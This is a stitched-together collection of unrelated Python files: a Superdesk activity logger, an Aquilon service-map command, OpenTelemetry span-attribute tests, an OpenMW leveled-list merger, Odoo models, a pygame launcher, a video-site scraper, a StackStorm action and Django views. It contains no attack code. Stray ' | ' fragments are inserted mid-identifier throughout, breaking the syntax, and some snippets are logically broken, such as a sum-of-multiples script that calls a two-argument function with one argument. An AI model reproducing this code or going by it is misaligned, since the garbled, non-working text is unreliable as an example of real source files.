ACTIVITY_EVENT = 'event'
ACTIVITY_ERROR = 'error'
def add_activity(activity_name, msg, resource=None, item=None, notify=None, notify_desks=None,
can_push_notification=True, **data):
"""
Adds an activity into activity log.
This will became part of current user activity log.
If there is someone set to be notified it will make it into his notifications box.
:param activity_name: Name of the activity
:type activity_name: str
:param msg: Message to be recorded in the activity log
:type msg: str
:param resource: resource name generating this activity
:type resource: str
:param item: article instance, if the activity is being recorded against an article, default None
:type item: dict
:param notify: user identifiers against whom the activity should be recorded, default None
:type notify: list
:param notify_desks: desk identifiers if someone mentions Desk Name in comments widget, default None
:type notify_desks: list
:param can_push_notification: flag indicating if a notification should be pushed via WebSocket, default True
:type can_push_notification: bool
:param data: kwargs
:type data: dict
:return: activity object
:rtype: dict
"""
activity = {
'name': activity_name,
'message': msg,
'data': data,
'resource': resource
}
name = ActivityResource.endpoint_name
user = getattr(g, 'user', None)
if user:
activity['user'] = user.get('_id')
activity['recipients'] = []
if notify:
activity['recipients'] = [{'user_id': ObjectId(_id), 'read': False | } for _id in notify]
name = activity_name
if notify_desks:
activity['recipients'].extend([{'desk_id': ObjectId(_id), 'read': False} for _id in notify_desks])
name = activity_name
if item:
activity['item'] = str(item.get('guid', item.get('_id')))
if item.get('task') and item['task'].get('d | esk'):
activity['desk'] = ObjectId(item['task']['desk'])
get_resource_service(ActivityResource.endpoint_name).post([activity])
if can_push_notification:
push_notification(name, _dest=activity['recipients'])
return activity
def notify_and_add_activity(activity_name, msg, resource=None, item=None, user_list=None, **data):
"""
Adds the activity and notify enabled and active users via email.
"""
add_activity(activity_name, msg=msg, resource=resource, item=item,
notify=[str(user.get("_id")) for user in user_list] if user_list else None, **data)
if activity_name == ACTIVITY_ERROR or user_list:
recipients = get_recipients(user_list, activity_name)
if activity_name != ACTIVITY_ERROR:
current_user = getattr(g, 'user', None)
activity = {
'name': activity_name,
'message': current_user.get('display_name') + ' ' + msg if current_user else msg,
'data': data,
'resource': resource
}
else:
activity = {
'name': activity_name,
'message': 'System ' + msg,
'data': data,
'resource': resource
}
if recipients:
send_activity_emails(activity=activity, recipients=recipients)
def get_recipients(user_list, activity_name):
if not user_list and activity_name == ACTIVITY_ERROR:
user_list = get_resource_service('users').get_users_by_user_type('administrator')
recipients = [user.get('email') for user in user_list if not user.get('needs_activation', True) and
user.get('is_enabled', False) and user.get('is_active', False) and
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq map service`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.aqdb.model import (Personality, HostEnvironment, ServiceMap,
ServiceInstance, NetworkEnvironment)
from aquilon.aqdb.model.host_environment import Production
from aquilon.worker.dbwrappers.change_management import (validate_prod_personality,
enforce_justification)
from aquilon.worker.dbwrappers.location import get_location
from aquilon.worker.dbwrappers.network import get_network_byip
class CommandMapService(BrokerCommand):
required_parameters = ["service", "instance"]
def doit(self, session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv):
if not dbmap:
dbmap = ServiceMap(service_instance=dbinstance, location=dblocation,
network=dbnetwork, personality=dbpersona,
host_environment=dbenv)
session.add(dbmap)
def render(self, session, logger, service, instance, archetype, personality,
host_environment, networkip, justification, reason, user,
**kwargs):
dbinstance = ServiceInstance.get_unique(session, service=service,
name=instance, compel=True)
dblocation = get_location(session, **kwargs)
if networkip:
dbnet_env = NetworkEnvironment.get_unique_or_default(session)
dbnetwork = get_network_byip(session, networkip, dbnet_env)
else:
dbnetwork = None
dbpersona = None
dbenv = None
if personality:
dbpersona = Personality.get_unique(session, name=personality,
arc | hetype=archetype, compel=True)
for dbstage in dbper | sona.stages.values():
validate_prod_personality(dbstage, user, justification, reason, logger)
elif host_environment:
dbenv = HostEnvironment.get_instance(session, host_environment)
if isinstance(dbenv, Production):
enforce_justification(user, justification, reason, logger)
else:
enforce_justification(user, justification, reason, logger)
q = session.query(ServiceMap)
q = q.filter_by(service_instance=dbinstance,
location=dblocation, network=dbnetwork,
personality=dbpersona,
host_environment=dbenv)
dbmap = q.first()
self.doit(session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv)
session.flush()
return
|
_attributes(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4),
ProtoSpan.Attributes(attribute_map={}),
)
def test_extract_variety_of_attributes(self):
self.assertEqual(
_extract_attributes(
self.attributes_variety_pack, num_attrs_limit=4
),
self.extracted_attributes_variety_pack,
)
def test_extract_label_mapping_attributes(self):
attributes_labels_mapping = {
"http.scheme": "http",
"http.host": "172.19.0.4:8000",
"http.method": "POST",
"http.request_content_length": 321,
"http.response_content_length": 123,
"http.route": "/fuzzy/search",
"http.status_code": 200,
"http.url": "http://172.19.0.4:8000/fuzzy/search",
"http.user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
}
extracted_attributes_labels_mapping = ProtoSpan.Attributes(
attribute_map={
"/http/client_protocol": AttributeValue(
string_value=TruncatableString(
value="http", truncated_byte_count=0
)
),
"/http/host": AttributeValue(
string_value=TruncatableString(
value="172.19.0.4:8000", truncated_byte_count=0
)
),
"/http/method": AttributeValue(
string_value=TruncatableString(
value="POST", truncated_byte_count=0
)
),
"/http/request/size": AttributeValue(int_value=321),
"/http/response/size": AttributeValue(int_value=123),
"/http/route": AttributeValue(
string_value=TruncatableString(
value="/fuzzy/search", truncated_byte_count=0
)
),
"/http/status_code": AttributeValue(int_value=200),
"/http/url": AttributeValue(
string_value=TruncatableString(
value="http://172.19.0.4:8000/fuzzy/search",
truncated_byte_count=0,
)
),
"/http/user_agent": AttributeValue(
string_value=TruncatableString(
value="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
truncated_byte_count=0,
)
),
}
)
self.assertEqual(
_extract_attributes(attributes_labels_mapping, num_attrs_limit=9),
extracted_attributes_labels_mapping,
)
def test_ignore_invalid_attributes(self):
self.assertEqual(
_extract_attributes(
{"illegal_attribute_value": {}, "legal_attribute": 3},
num_attrs_limit=4,
),
ProtoSpan.Attributes(
attribute_map={"legal_attribute": AttributeValue(int_value=3)},
dropped_attributes_count=1,
),
)
def test_too_many_attributes(self):
too_many_attrs = {}
for attr_key in range(5):
too_many_attrs[str(attr_key)] = 0
proto_attrs = _extract_attributes(too_many_attrs, num_attrs_limit=4)
self.assertEqual(proto_attrs.dropped_attributes_count, 1)
def test_add_agent_attribute(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4, add_agent_attr=True),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=0,
),
)
def test_agent_attribute_priority(self):
# Drop exi | sting attributes in favor of the agent attribute
self.assertEqual(
_extract_attributes(
{"attribute_key": "attr_value"},
num_attrs_limit=1,
add_agent_attr=True,
),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=1,
),
)
def test_attribute_value_truncation(self):
# shouldn't truncate
| self.assertEqual(
_format_attribute_value(self.str_300),
AttributeValue(
string_value=TruncatableString(
value=self.str_300,
truncated_byte_count=0,
)
),
)
# huge string should truncate
self.assertEqual(
_format_attribute_value(self.str_20kb),
AttributeValue(
string_value=TruncatableString(
value=self.str_16kb,
truncated_byte_count=(20 - 16) * 1024,
)
),
)
def test_list_attribute_value(self):
self.assertEqual(
_format_attribute_value(("one", "two")),
AttributeValue(
string_value=TruncatableString(
value="one,two", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([True]),
AttributeValue(
string_value=TruncatableString(
value="True", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value((2, 5)),
AttributeValue(
string_value=TruncatableString(
value="2,5", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([2.0, 0.5, 4.55]),
AttributeValue(
string_value=TruncatableString(
value="2.0,0.5,4.55", truncated_byte_count=0
)
),
)
def test_attribute_key_truncation(self):
self.assertEqual(
_extract_attributes(
{self.str_300: "attr_value"}, num_attrs_limit=4
),
ProtoSpan.Attributes(
attribute_map={
self.str_128: AttributeValue(
string_value=TruncatableString(
value="attr_value", truncated_byte_count=0
)
)
}
),
)
def test_extract_empty_events(self):
self.assertIsNone(_extract_events([]))
def test_too_many_events(self):
event = Event(
name="event", timestamp=self.example_time_in_ns, attributes={}
)
too_many_events = [event] * (MAX_NUM_EVENTS + 5)
self.assertEqual(
_extract_events(too_many_events),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value="event",
),
"attributes": {},
},
},
]
* MAX_NUM_EVENTS,
dropped_annotations_count=len(too_many_events)
- MAX_NUM_EVENTS,
),
)
def test_too_many_event_attributes(self):
event_attrs = {}
for attr_key in range(MAX_EVENT_ATTRS + 5):
event_attrs[str(attr_key)] = 0
proto_events = _extract_events(
[
Event(
name="a",
attributes=event_attrs,
timestamp=self.example_time_in_ns,
)
]
)
self.assertEqual(
len(
proto_events.time_event[0].annotation.attributes.attribute_map
|
ata'])
levrec['chancenone'] = parseNum(sr[2]['data'])
levrec['file'] = os.path.basename(rec['fullpath'])
# Apparently, you can have LEV records that end before
# the INDX subrecord. Found those in Tamriel_Data.esm
if len(sr) > 3:
listcount = parseNum(sr[3]['data'])
listitems = []
for i in range(0,listcount*2,2):
itemid = parseString(sr[4+i]['data'])
itemlvl = parseNum(sr[5+i]['data'])
listitems.append((itemlvl, itemid))
levrec['items'] = listitems
else:
levrec['items'] = []
return levrec
def parseTES3(rec):
tesrec = {}
sr = rec['subrecords']
tesrec['version'] = parseFloat(sr[0]['data'][0:4])
tesrec['filetype'] = parseNum(sr[0]['data'][4:8])
tesrec['author'] = parseString(sr[0]['data'][8:40])
tesrec['desc'] = parseString(sr[0]['data'][40:296])
tesrec['numrecords'] = parseNum(sr[0]['data'][296:300])
masters = []
for i in range(1, len(sr), 2):
mastfile = parseString(sr[i]['data'])
mastsize = parseNum(sr[i+1]['data'])
masters.append((mastfile, mastsize))
tesrec['masters'] = masters
return tesrec
def pullSubs(rec, subtype):
return [ s for s in rec['subrecords'] if s['type'] == subtype ]
def readHeader(ba):
header = {}
header['type'] = ba[0:4].decode()
header['length'] = int.from_bytes(ba[4:8], 'little')
return header
def readSubRecord(ba):
sr = {}
sr['type'] = ba[0:4].decode()
sr['length'] = int.from_bytes(ba[4:8], 'little')
endbyte = 8 + sr['length']
sr['data'] = ba[8:endbyte]
return (sr, ba[endbyte:])
def readRecords(filename):
fh = open(filename, 'rb')
while True:
headerba = fh.read(16)
if headerba is None or len(headerba) < 16:
return None
record = {}
header = readHeader(headerba)
record['type'] = header['type']
record['length'] = header['length']
record['subrecords'] = []
# stash the filename here (a bit hacky, but useful)
record['fullpath'] = filename
remains = fh.read(header['length'])
while len(remains) > 0:
(subrecord, restofbytes) = readSubRecord(remains)
record['subrecords'].append(subrecord)
remains = restofbytes
yield record
def oldGetRecords(filename, rectype):
return ( r for r in readRecords(filename) if r['type'] == rectype )
def getRecords(filename, rectypes):
numtypes = len(rectypes)
retval = [ [] for x in range(numtypes) ]
for r in readRecords(filename):
if r['type'] in rectypes:
for i in range(numtypes):
if r['type'] == rectypes[i]:
retval[i].append(r)
return retval
def packStringSubRecord(lbl, strval):
str_bs = packString(strval) + bytes(1)
l = packLong(len(str_bs))
return packString(lbl) + l + str_bs
def packIntSubRecord(lbl, num, numsize=4):
# This is interesting. The 'pack' function from struct works fine like this:
#
# >>> pack('<l', 200)
# b'\xc8\x00\x00\x00'
#
# but breaks if you make that format string a non-literal:
#
# >>> fs = '<l'
# >>> pack(fs, 200)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# struct.error: repeat count given without format specifier
#
# This is as of Python 3.5.2
num_bs = b''
if numsize == 4:
# "standard" 4-byte longs, little-endian
num_bs = pack('<l', num)
elif numsize == 2:
num_bs = pack('<h', num)
elif numsize == 1:
# don't think endian-ness matters for bytes, but consistency
num_bs = pack('<b', num)
elif numsize == 8:
num_bs = pack('<q', num)
return packString(lbl) + packLong(numsize) + num_bs
def packLEV(rec):
start_bs = b'' |
id_bs = b''
if rec['type'] == 'LEVC':
start_bs += b'LEVC'
id_bs = 'CNAM'
else:
start_bs += b'LEVI'
id_bs = 'INAM'
headerflags_bs = bytes(8)
name_bs = packStringSubRecord('NAME', rec['name'])
calcfrom_bs = packIntSubRecord('DATA', rec['calcfrom'])
chance_bs = packIntSubRecord('NNAM', rec['chancenone'], 1)
subrec_bs = packIntSubRecord('INDX', len(rec['items']))
for (lvl, lid) in rec['items']:
subrec_bs += packStringSubRecord(id | _bs, lid)
subrec_bs += packIntSubRecord('INTV', lvl, 2)
reclen = len(name_bs) + len(calcfrom_bs) + len(chance_bs) + len(subrec_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
name_bs + calcfrom_bs + chance_bs + subrec_bs
def packTES3(desc, numrecs, masters):
start_bs = b'TES3'
headerflags_bs = bytes(8)
hedr_bs = b'HEDR' + packLong(300)
version_bs = pack('<f', 1.0)
# .esp == 0, .esm == 1, .ess == 32
# suprisingly, .omwaddon == 0, also -- figured it would have its own
ftype_bs = bytes(4)
author_bs = packPaddedString('omwllf, copyright 2017, jmelesky', 32)
desc_bs = packPaddedString(desc, 256)
numrecs_bs = packLong(numrecs)
masters_bs = b''
for (m, s) in masters:
masters_bs += packStringSubRecord('MAST', m)
masters_bs += packIntSubRecord('DATA', s, 8)
reclen = len(hedr_bs) + len(version_bs) + len(ftype_bs) + len(author_bs) +\
len(desc_bs) + len(numrecs_bs) + len(masters_bs)
reclen_bs = packLong(reclen)
return start_bs + reclen_bs + headerflags_bs + \
hedr_bs + version_bs + ftype_bs + author_bs + \
desc_bs + numrecs_bs + masters_bs
def ppSubRecord(sr):
if sr['type'] in ['NAME', 'INAM', 'CNAM']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseString(sr['data'])))
elif sr['type'] in ['DATA', 'NNAM', 'INDX', 'INTV']:
print(" %s, length %d, value '%s'" % (sr['type'], sr['length'], parseNum(sr['data'])))
else:
print(" %s, length %d" % (sr['type'], sr['length']))
def ppRecord(rec):
print("%s, length %d" % (rec['type'], rec['length']))
for sr in rec['subrecords']:
ppSubRecord(sr)
def ppLEV(rec):
if rec['type'] == 'LEVC':
print("Creature list '%s' from '%s':" % (rec['name'], rec['file']))
else:
print("Item list '%s' from '%s':" % (rec['name'], rec['file']))
print("flags: %d, chance of none: %d" % (rec['calcfrom'], rec['chancenone']))
for (lvl, lid) in rec['items']:
print(" %2d - %s" % (lvl, lid))
def ppTES3(rec):
print("TES3 record, type %d, version %f" % (rec['filetype'], rec['version']))
print("author: %s" % rec['author'])
print("description: %s" % rec['desc'])
for (mfile, msize) in rec['masters']:
print(" master %s, size %d" % (mfile, msize))
print()
def mergeableLists(alllists):
candidates = {}
for l in alllists:
lid = l['name']
if lid in candidates:
candidates[lid].append(l)
else:
candidates[lid] = [l]
mergeables = {}
for k in candidates:
if len(candidates[k]) > 1:
mergeables[k] = candidates[k]
return mergeables
def mergeLists(lls):
# last one gets priority for list-level attributes
last = lls[-1]
newLev = { 'type': last['type'],
'name': last['name'],
'calcfrom': last['calcfrom'],
'chancenone': last['chancenone'] }
allItems = []
for l in lls:
allItems += l['items']
newLev['files'] = [ x['file'] for x in lls ]
newLev['file'] = ', '.join(newLev['files'])
# This ends up being a bit tricky, but it prevents us
# from overloading lists with the same stuff.
#
# This is needed, because the original leveled lists
# contain multiple entries for some creatures/items, and
# that gets reproduced in many plugins.
#
# If we just added and sorted, then the more plugins you
# have, the less often you'd see plugin content. This
# method prevents the core game content from overwhelming
# plugin contents.
allUniques = [ x for x in set(allItems) ]
allUniques.sort()
newList = []
for i in all |
#!/bin/python
import sys
def getSumOfAP(n, max):
| size = (max - 1) // n
return (size * (n + size * (n)) / 2)
def getSumOfMultiples(n):
return (getSumOfAP(3, n) + getSumOfAP(5, n) - getSumOfAP(15, n))
def main():
numInputs = int(raw_input().strip())
for idx in xrange( | numInputs):
n = int(raw_input().strip())
ans = getSumOfAP(n)
print(ans)
if __name__ == '__main__':
main()
|
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING | BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint import AnsibleLintRule
class MismatchedBracketRule(AnsibleLintRule):
id = 'ANSIBLE0003'
shortdesc = 'Mismatched { and }'
description = 'If lines contain more { than } or vice ' + \
'versa then templating can fail nastily'
tags = ['templating']
def match(self, file, line):
return line.count("{") != line.count("}")
|
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
from datetime import *
import time
class clv_tray(models.Model):
_inherit = 'clv_tray'
date = fields.Datetime("Status change date", required=True, readonly=True,
default=lambda *a: datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
date_activation = fields.Datetime("Activation date", required=False, readonly=False)
date_inactivation = fields.Datetime("Inactivation date", required=False, readonly=False)
date_suspension = fields.Datetime("Suspension date", required=False, readonly=False)
state = fields.Selection([('new','New'),
('active','Active'),
('inactive','Inactive'),
('suspended','Suspended')
], string='Status', default='new', readonly=True, required=True, help="")
@api.one
def button_new(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.stat | e = 'new'
@api.one
def bu | tton_activate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_activation:
self.date_activation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'active'
@api.one
def button_inactivate(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_inactivation:
self.date_inactivation = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'inactive'
@api.one
def button_suspend(self):
self.date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not self.date_suspension:
self.date_suspension = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(1.0)
self.state = 'suspended'
|
def init_actions_(service, args):
"""
this needs to returns an array of actions representing the depencies between actions.
Looks at ACTION_DEPS in this module for an example of what is expected
"""
# some default logic for simple actions
return {
'test': ['install']
}
def test(job):
"""
Tests parsing of a bp with/without default values
"""
import sys
RESULT_OK = 'OK : %s'
RESULT_FAILED = 'FAILED : %s'
RESULT_ERROR = 'ERROR : %s %%s' % job.service.name
model = job.service.model
model.data.result = RESU | LT_OK % job.service.name
test_repo_path = j.sal.fs. | joinPaths(j.dirs.varDir, 'tmp', 'test_validate_model')
sample_bp_path = j.sal.fs.joinPaths('/opt/code/github/jumpscale/jumpscale_core8/tests/samples/test_validate_delete_model_sample.yaml')
try:
if j.sal.fs.exists(test_repo_path):
j.sal.fs.removeDirTree(test_repo_path)
test_repo = j.atyourservice.repoCreate(test_repo_path, 'git@github.com:0-complexity/ays_automatic_cockpit_based_testing.git')
bp_path = j.sal.fs.joinPaths(test_repo.path, 'blueprints', 'test_validate_delete_model_sample.yaml')
j.sal.fs.copyFile(j.sal.fs.joinPaths(sample_bp_path), j.sal.fs.joinPaths(test_repo.path, 'blueprints'))
test_repo.blueprintExecute(bp_path)
action = 'install'
role = 'sshkey'
instance = 'main'
for service in test_repo.servicesFind(actor="%s.*" % role, name=instance):
service.scheduleAction(action=action, period=None, log=True, force=False)
run = test_repo.runCreate(profile=False, debug=False)
run.execute()
test_repo.destroy()
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "actors")):
model.data.result = RESULT_FAILED % ('Actors directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "services")):
model.data.result = RESULT_FAILED % ('Services directory is not deleted')
if j.sal.fs.exists(j.sal.fs.joinPaths(test_repo.path, "recipes")):
model.data.result = RESULT_FAILED % ('Recipes directory is not deleted')
if test_repo.actors:
model.data.result = RESULT_FAILED % ('Actors model is not removed')
if test_repo.services:
model.data.result = RESULT_FAILED % ('Services model is not removed')
if not j.core.jobcontroller.db.runs.find(repo=test_repo.model.key):
model.data.result = RESULT_FAILED % ('Jobs are deleted after repository destroy')
except:
model.data.result = RESULT_ERROR % str(sys.exc_info()[:2])
finally:
job.service.save()
|
#!/bin/python
def swap(findex, sindex, ar):
ar[findex], ar[sindex] = ar[sindex], ar[findex]
def partition(ar, lo, hi):
'''3 way djisktra partition method'''
start = lo
pivotIndex = (lo+hi)//2
# take the elemet @ hi as the pivot and swap it to pivotIndex position
swap(pivotIndex, hi, ar)
pivotIndex = hi
pivot = ar[pivotIndex]
eq = lo
for index in xrange(lo, hi):
if (ar[eq] == pivot):
eq += 1
if (ar[index] < pivot and index < pivotIndex):
swap(index, lo, ar)
lo += 1
eq +=1
swap( | lo, pivotIndex, ar)
return lo
def quickSort(ar):
'''Iterative unstable in-place sort'''
n = len(ar)
hi = n-1
lo = 0
stack = [(lo, hi)]
while stack:
lo, hi = stack.pop()
pivot = partition(ar, lo, hi)
if lo<pivot-1:
stack.insert(0, (lo, pivot-1))
if pivot+1<hi:
stack.insert(0, (pivot+1, hi))
def quickSortRec(ar, n, lo, hi):
'''Recursive unstable in-place sort'''
pivot = partition(ar, lo, hi)
# print lo, pivot, | hi
if lo<pivot-1 and lo != pivot:
quickSortRec(ar, n, lo, pivot-1)
# print ' '.join(ar)
if pivot+1<hi and pivot != hi:
quickSortRec(ar, n, pivot+1, hi)
# print ' '.join(ar) |
from __future__ import absolute_import
import re
import json
import copy
import os
from svtplay_dl.service import Service, OpenGraphThumbMixin
from svtplay_dl.utils.urllib import urlparse
from svtplay_dl.utils import filenamify
from svtplay_dl.fetcher.http import HTTP
from svtplay_dl.fetcher.hds import hdsparse
from svtplay_dl.fetcher.hls import HLS, hlsparse
from svtplay_dl.error import ServiceError
class Vg(Service, OpenGraphThumbMixin):
supported_domains = ['vg.no', 'vgtv.no']
def get(self, options):
data = self.get_urldata()
match = re.search(r'data-videoid="([^"]+)"', data)
if not match:
parse = urlparse(self.url)
match = re.search(r'video/(\d+)/', parse.fragment)
if not match:
yield Serv | iceError("Can't find video file for: %s" % self.url)
return
videoid = match.group(1)
data = self.http.request("get", "http://svp.vg.no/svp/api/v1/vgtv/assets/%s?appName=vgtv-website" % videoid).text
jsondata = json.loads(data)
if options.output_auto:
directory = os.path | .dirname(options.output)
title = "%s" % jsondata["title"]
title = filenamify(title)
if len(directory):
options.output = os.path.join(directory, title)
else:
options.output = title
if self.exclude(options):
yield ServiceError("Excluding video")
return
if "hds" in jsondata["streamUrls"]:
streams = hdsparse(copy.copy(options), self.http.request("get", jsondata["streamUrls"]["hds"], params={"hdcore": "3.7.0"}).text, jsondata["streamUrls"]["hds"])
if streams:
for n in list(streams.keys()):
yield streams[n]
if "hls" in jsondata["streamUrls"]:
streams = hlsparse(jsondata["streamUrls"]["hls"], self.http.request("get", jsondata["streamUrls"]["hls"]).text)
for n in list(streams.keys()):
yield HLS(copy.copy(options), streams[n], n)
if "mp4" in jsondata["streamUrls"]:
yield HTTP(copy.copy(options), jsondata["streamUrls"]["mp4"])
|
from st2actions.runners.pythonrunner import Action
from st2client.client import Client
# Keep Compatability with 0.8 and 0.11 until st2build is upgraded
try:
from st2client.models.datastore import KeyValuePair
except ImportError:
from st2client.models.keyvalue import KeyValuePair
class KVPAction(Action):
def run(self, key, action, st2host='localhost', value=""):
try:
client = Client()
except Exception as e:
return e
if action == 'get':
kvp = client.keys.get_by_name(key)
if not kvp:
raise Exception('Key error with %s.' % key)
return kvp.value
else:
instance = client.keys.get_by_name(key) or KeyVa | luePair()
instance.id = key
instance.name = key
instance.value = value
kvp = client.keys.update(instance) if action in ['create', 'update'] else None
if action == 'delete':
return kvp
else:
| return kvp.serialize()
|
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from mainmodels.models import Course, FeaturedCourse
# Create your views here.
def index(req):
mostPopularCourses = Course.objects.raw('SELECT * FROM mainmodels_course as main_course JOIN (SELECT main_tran.courseID, COUNT(main_tran.takerID) as taker_amount FROM mainmodels_transaction as main_tran GROUP BY main_tran.courseID ORDER BY taker_amount DESC) as main_count ON main_course.courseID = main_count.courseID LIMIT 10;')
featureCourses = FeaturedCourse.objects.raw('SELECT * FROM mainmodels_featuredcourse as main_feat JOIN mainmodels_course as main_course ON mai | n_feat.course_id = main_course.courseID LIMIT 10;')
return ren | der(req, 'index/main.html', {'pageTitle': 'Coursing Field', 'mostPopularCourses': mostPopularCourses, 'featureCourses': featureCourses})
|
#!/usr/bin/python
import pygame
import math
import random
import sys
import PixelPerfect
from pygame.locals import *
from water import Water
from menu import Menu
from game import Game
from highscores import Highscores
from options import Options
import util
from locals import *
import health
import cloud
import mine
import steamboat
import pirateboat
import shark
import seagull
def init():
health.init()
steamboat.init()
shark.init()
pirateboat.init()
cloud.init()
mine.init()
seagull.init()
def main():
global SCREEN_FULLSCREEN
pygame.init()
util.load_config()
if len(sys.argv) > 1:
for arg in sys.argv:
if arg == "-np":
Variables.particles = False
elif arg == "-na":
Variables.alpha = False
elif arg == "-nm":
Variables.music = False
elif arg == "-ns":
Variables.sound = False
elif arg == "-f":
SCREEN_FULLSCREEN = True
scr_options = 0
if SCREEN_FULLSCREEN: scr_options += FULLSCREEN
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT),scr_options ,32)
pygame.display.set_icon(util.load_image("kuvake"))
pygame.display.set_caption("Trip on the Funny Boat")
init()
joy = None
if pygame.joystick.get_count() > 0:
joy = pygame.joystick.Joystick(0)
joy.init()
try:
util.load_music("JDruid-Trip_on_the_Funny_Boat")
if Variables.music:
pygame.mixer.music.play(-1)
except:
# It's not a critical problem if there's no music
pass
pygame.time.set_timer(NEXTFRAME, 1000 / FPS) # 30 fps
Water.global_water = Water()
main_selection = 0
while True:
main_selection = Menu(screen, ("New Game", "High Scores", "Options", "Quit"), main_selection).run()
if main_selection == 0:
# New Game
selection = Menu(screen, ("Story Mode", "Endless Mode")).run()
if selection == 0:
# Story
score = Game(screen).run()
Highscores(screen, score).run()
elif selection == 1:
# Endless
score = Game(screen, True).run()
Highscores(screen, score, True).run()
elif main_selection == 1:
# High Scores
selection = 0
while True:
selection = Menu(screen, ("Story Mode", "Endless Mode", "Endless Online"), selection).run()
if selection == 0:
# Story
Highscores(screen).run()
elif selection == 1:
# Endless
Highscores(scre | en, endless = True).run()
elif selection == 2:
# Online
Highscores(screen, endless = True, online = True).run()
else:
break
elif main_selection == 2:
# Options
selection = | Options(screen).run()
else: #if main_selection == 3:
# Quit
return
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright | (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# A | ll Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Partner Fix',
'version': '8.0.1.0.0',
'category': '',
'sequence': 14,
'summary': '',
'description': """
Portal Partner Fix
==================
Let user read his commercial partner
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'portal',
],
'data': [
'security/portal_security.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: |
#!/usr/bin/python
import os
